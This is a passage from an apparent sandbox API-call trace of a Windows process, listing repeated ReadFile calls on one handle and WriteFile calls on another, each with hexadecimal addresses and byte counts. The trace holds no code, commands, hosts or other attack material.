hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.219] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.223] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.227] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.227] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.228] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.229] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.234] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.237] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.242] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.244] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.246] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.249] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.250] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.251] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.251] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.252] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.254] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.255] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.256] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.257] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.259] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.260] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.263] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.265] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.266] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.267] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, 